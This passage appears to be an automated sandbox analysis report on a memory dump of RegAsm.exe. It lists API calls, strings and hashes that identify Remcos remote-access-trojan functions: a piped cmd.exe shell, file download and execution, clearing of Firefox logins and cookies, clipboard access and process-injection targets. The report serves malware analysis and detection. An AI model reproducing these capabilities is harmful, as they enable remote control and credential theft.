                        • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                        • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                        • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                        • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                        • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                        • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                        • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                      • String ID:
                      • API String ID: 1170566393-0
                      • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                      • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                      • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                      • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                      • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                      • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                      • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                      APIs
                        • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                      • _free.LIBCMT ref: 00450140
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                      • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                      • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                      • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                      • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                      • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                      • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                      • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                      • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                      • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                      APIs
                      • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                      • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                      • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                      • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                      APIs
                      • std::_Deallocate.LIBCONCRT ref: 00402E2B
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Deallocatestd::_
                      • String ID:
                      • API String ID: 1323251999-0
                      • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                      • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                      • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                      • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                      • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                      • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                      • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                      • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                      • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                      • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                      APIs
                      • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                      • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                      • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                      • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                      APIs
                      • SetEvent.KERNEL32(?,?), ref: 00407CB9
                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                      • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                        • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                        • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                        • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                      • DeleteFileA.KERNEL32(?), ref: 00408652
                        • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                        • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                        • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                        • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                      • Sleep.KERNEL32(000007D0), ref: 004086F8
                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                        • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                      • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                      • API String ID: 1067849700-181434739
                      • Opcode ID: 4273a2db050939bb843d785740ba02daf0a4930e0a07366dc24323b56e3e065a
                      • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                      • Opcode Fuzzy Hash: 4273a2db050939bb843d785740ba02daf0a4930e0a07366dc24323b56e3e065a
                      • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 004056E6
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • __Init_thread_footer.LIBCMT ref: 00405723
                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                      • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                      • CloseHandle.KERNEL32 ref: 00405A23
                      • CloseHandle.KERNEL32 ref: 00405A2B
                      • CloseHandle.KERNEL32 ref: 00405A3D
                      • CloseHandle.KERNEL32 ref: 00405A45
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                      • API String ID: 2994406822-18413064
                      • Opcode ID: a9c941d780db6803c83a75e3fcea25a92e6c4e31e50fd1064174db21a6d32d60
                      • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                      • Opcode Fuzzy Hash: a9c941d780db6803c83a75e3fcea25a92e6c4e31e50fd1064174db21a6d32d60
                      • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                      APIs
                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                        • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                      • CloseHandle.KERNEL32(00000000), ref: 00412155
                      • CreateThread.KERNEL32(00000000,00000000,Function_000127EE,00000000,00000000,00000000), ref: 004121AB
                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpen$HandleMutexProcessThreadValue
                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                      • API String ID: 261377708-13974260
                      • Opcode ID: 607e5bd206d14a92b37c4d204e9fb6591ba10676959733a8729624ae85c57a6b
                      • Instruction ID: 5044532447ce4e70f722e285ad7bc5f912dfeea71c25201e33dbc8cc77036b6f
                      • Opcode Fuzzy Hash: 607e5bd206d14a92b37c4d204e9fb6591ba10676959733a8729624ae85c57a6b
                      • Instruction Fuzzy Hash: 8171823160430167C618FB72CD579AE73A4AED0308F50057FF546A61E2FFBC9949C69A
                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                      • FindClose.KERNEL32(00000000), ref: 0040BBC9
                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                      • FindClose.KERNEL32(00000000), ref: 0040BD12
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFile$FirstNext
                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                      • API String ID: 1164774033-3681987949
                      • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                      • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                      • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                      • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                      APIs
                      • OpenClipboard.USER32 ref: 004168C2
                      • EmptyClipboard.USER32 ref: 004168D0
                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                      • GlobalLock.KERNEL32(00000000), ref: 004168F9
                      • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                      • CloseClipboard.USER32 ref: 00416955
                      • OpenClipboard.USER32 ref: 0041695C
                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                      • CloseClipboard.USER32 ref: 00416984
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                      • String ID: !D@
                      • API String ID: 3520204547-604454484
                      • Opcode ID: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                      • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                      • Opcode Fuzzy Hash: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                      • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                      • FindClose.KERNEL32(00000000), ref: 0040BDC9
                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                      • FindClose.KERNEL32(00000000), ref: 0040BEAF
                      • FindClose.KERNEL32(00000000), ref: 0040BED0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$Close$File$FirstNext
                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                      • API String ID: 3527384056-432212279
                      • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                      • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                      • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                      • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                      APIs
                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                      • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                      • CloseHandle.KERNEL32(00000000), ref: 0041345F
                      • CloseHandle.KERNEL32(?), ref: 00413465
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                      • String ID:
                      • API String ID: 297527592-0
                      • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                      • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                      • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                      • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                      • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                      • API String ID: 3756808967-1743721670
                      • Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                      • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                      • Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                      • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0$1$2$3$4$5$6$7$VG
                      • API String ID: 0-1861860590
                      • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                      • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                      • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
